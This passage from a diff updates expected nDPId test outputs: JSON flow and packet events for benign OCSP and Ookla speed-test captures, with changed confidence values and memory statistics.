-00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":224,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1623226796047,"flow_last_seen":1623226963037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":799,"flow_tot_l4_payload_len":3558,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1623227472228,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623227472211,"flow_last_seen":1623227472219,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":401,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1623227472219,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.globalsign.com","url":"ocsp.globalsign.com\/gsrsaovsslca2018","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":224,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1623226796047,"flow_last_seen":1623226963037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":799,"flow_tot_l4_payload_len":3558,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1623227472228,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":275,"packets-processed":274,"total-skipped-flows":0,"total-l4-payload-len":23358,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":52,"global_ts_msec":1623229632695} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623229632695,"flow_last_seen":1623229632695,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623229632695,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1623229632695,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229632695,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA82G5AAEAGQmzAqAGAbUbwcrHKAFDtwUNWAAAAAKAC+vAcMQAAAgQFtAQCCAoRKRyhAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADZRLNb"} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1623229632706,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229632706,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADUGJdttRvBywKgBgABQscrfcozQ7cFDV6AScSAwDQAAAgQFtAQCCAq9uUvmESkcoQEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADSBFoQ"} 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1623229632711,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623229632711,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA02G9AAEAGQnPAqAGAbUbwcrHKAFDtwUNX33KM0YAQAfbN9AAAAQEIChEpHLC9uUvmGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0EjACA=="} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623229632695,"flow_last_seen":1623229632711,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":399,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1623229632711,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp09.actalis.it","url":"ocsp09.actalis.it\/VA\/AUTHOV-G3","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":284,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1623227472211,"flow_last_seen":1623227587356,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":2399,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1623229632732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":284,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1623227471703,"flow_last_seen":1623227587366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1006,"flow_tot_l4_payload_len":1402,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1623229632732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623229632695,"flow_last_seen":1623229632711,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":399,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1623229632711,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp09.actalis.it","url":"ocsp09.actalis.it\/VA\/AUTHOV-G3","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":284,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1623227472211,"flow_last_seen":1623227587356,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":2399,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1623229632732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":284,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1623227471703,"flow_last_seen":1623227587366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1006,"flow_tot_l4_payload_len":1402,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1623229632732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623229850956,"flow_last_seen":1623229850956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623229850956,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1623229850956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229850956,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8+shAAEAGBi7AqAGAFwxgkb+KAFDAJRPhAAAAAKAC+vCvFgAAAgQFtAQCCAqOHkIzAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACxCLhj"} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1623229850968,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229850968,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgGCPcXDGCRwKgBgABQv4rZVTUewCUT4qAS\/ohT3AAAAgQFtAQCCAoG1UJIjh5CMwEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABvS4I1"} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1623229850972,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623229850972,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0+slAAEAGBjXAqAGAFwxgkb+KAFDAJRPi2VU1H4AQAfZ\/KgAAAQEICo4eQkQG1UJIGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAV7trsA=="} -00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623229850956,"flow_last_seen":1623229850973,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623229850973,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.entrust.net","url":"ocsp.entrust.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":320,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623229632695,"flow_last_seen":1623229697742,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2724,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1623229853240,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} -00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":344,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1623229850956,"flow_last_seen":1623229968257,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7031,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1623229968257,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623229850956,"flow_last_seen":1623229850973,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623229850973,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.entrust.net","url":"ocsp.entrust.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":320,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623229632695,"flow_last_seen":1623229697742,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2724,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1623229853240,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":344,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1623229850956,"flow_last_seen":1623229968257,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7031,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1623229968257,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":344,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":344,"packets-processed":344,"total-skipped-flows":0,"total-l4-payload-len":33113,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":10,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":10,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":67,"global_ts_msec":1623229968257} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 344/344 @@ -73,9 +73,9 @@ ~~ total active/idle flows...: 10/10 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5890591 bytes -~~ total memory freed........: 5890591 bytes -~~ total allocations/frees...: 118542/118542 +~~ total memory allocated....: 6024225 bytes +~~ total memory freed........: 6024225 bytes +~~ total allocations/frees...: 121304/121304 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 908 chars diff --git a/test/results/ookla.pcap.out b/test/results/ookla.pcap.out index 68809ced6..4449b23f8 100644 --- a/test/results/ookla.pcap.out +++ b/test/results/ookla.pcap.out @@ -4,14 +4,14 @@ 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1491069108756,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1491069108756,"pkt":"gCqojWksxCwDBkn+CABFAABAClpAAEAGAADAqAEHLiz9u8gHAFAHQx4AAAAAALAC\/\/\/tyQAAAgQFtAEDAwUBAQgKDd4HoAAAAAAEAgAA"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1491069108793,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1491069108793,"pkt":"xCwDBkn+gCqojWksCABFAAA8AABAADMGWiUuLP27wKgBBwBQyAdRUNK1B0MeAaASOJAJ5wAAAgQFrAQCCAp\/4XDqDd4HoAEDAwU="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1491069108793,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491069108793,"pkt":"gCqojWksxCwDBkn+CABFAAA0s5FAAEAGAADAqAEHLiz9u8gHAFAHQx4BUVDStoAQECztvQAAAQEICg3eB8R\/4XDq"} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491069108756,"flow_last_seen":1491069108794,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":342,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1491069108794,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Ookla","breed":"Safe","category":"Network"},"http": {}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491069108756,"flow_last_seen":1491069108794,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":342,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1491069108794,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Ookla","breed":"Safe","category":"Network"},"http": {}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491069115107,"flow_last_seen":1491069115107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491069115107,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1491069115107,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1491069115107,"pkt":"gCqojWksxCwDBkn+CABFAABAzJ5AAEAGAADAqAEHLiz9u8gPH5CtI6zKAAAAALAC\/\/\/tyQAAAgQFtAEDAwUBAQgKDd4f9gAAAAAEAgAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1491069115144,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1491069115144,"pkt":"xCwDBkn+gCqojWksCABFAAA8AABAADMGWiUuLP27wKgBBx+QyA8qkdUorSOsy6ASOJC7tQAAAgQFrAQCCAp\/4XceDd4f9gEDAwU="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1491069115144,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491069115144,"pkt":"gCqojWksxCwDBkn+CABFAAA0VElAAEAGAADAqAEHLiz9u8gPH5CtI6zLKpHVKYAQECztvQAAAQEICg3eIBp\/4Xce"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491069115107,"flow_last_seen":1491069115172,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491069115172,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"Ookla","breed":"Safe","category":"Network"}} -00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5066,"flow_first_seen":1491069115107,"flow_last_seen":1491069155251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4346133,"flow_avg_l4_payload_len":857,"midstream":0,"thread_ts_msec":1491069155251,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"Ookla","breed":"Safe","category":"Network"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1491069108756,"flow_last_seen":1491069114084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":457,"flow_tot_l4_payload_len":2980,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1491069155251,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491069115107,"flow_last_seen":1491069115172,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491069115172,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"Ookla","breed":"Safe","category":"Network"}} +00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5066,"flow_first_seen":1491069115107,"flow_last_seen":1491069155251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4346133,"flow_avg_l4_payload_len":857,"midstream":0,"thread_ts_msec":1491069155251,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"Ookla","breed":"Safe","category":"Network"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1491069108756,"flow_last_seen":1491069114084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":457,"flow_tot_l4_payload_len":2980,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1491069155251,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Ookla","breed":"Safe","category":"Network"}} 